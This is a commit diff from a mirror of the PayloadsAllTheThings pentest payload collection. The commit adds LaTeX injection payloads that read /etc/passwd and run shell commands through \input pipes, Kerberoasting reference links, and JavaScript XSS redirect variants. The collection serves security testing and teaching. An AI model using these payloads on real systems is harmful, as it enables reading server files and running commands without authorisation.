ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-20 03:16:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

LaTeX display code + XSS location alternative

Browse Source
This commit is contained in:
Swissky 2018-08-01 21:19:18 +02:00
parent dcc5ebd3b6
commit 644724396f
3 changed files with 17 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
LaTeX injection/README.md
View File

@ -26,6 +26,13 @@ Read multiple lined file
\closein\file
```
Read text file, keep the formatting
```bash
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
## Write file
```bash
\newwrite\outfile
@ -48,6 +55,7 @@ If you get any LaTex error, consider using base64 to get the result without bad
```bash
\input|ls|base4
\input{|"/bin/hostname"}
```

1
Methodology and Resources/Active Directory Attack.md
View File

@ -278,6 +278,7 @@ TODO
### Kerberoast
```c
https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
https://room362.com/post/2016/kerberoast-pt1/

8
XSS injection/README.md
View File

@ -424,6 +424,14 @@ foo="text </script><script>alert(1)</script>";
</script>
```
Bypass using an alternate way to redirect
```javascript
location="http://google.com"
document.location = "http://google.com"
document.location.href="http://google.com"
window.location.assign("http://google.com")
window['location']['href']="http://google.com"
```
Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
```javascript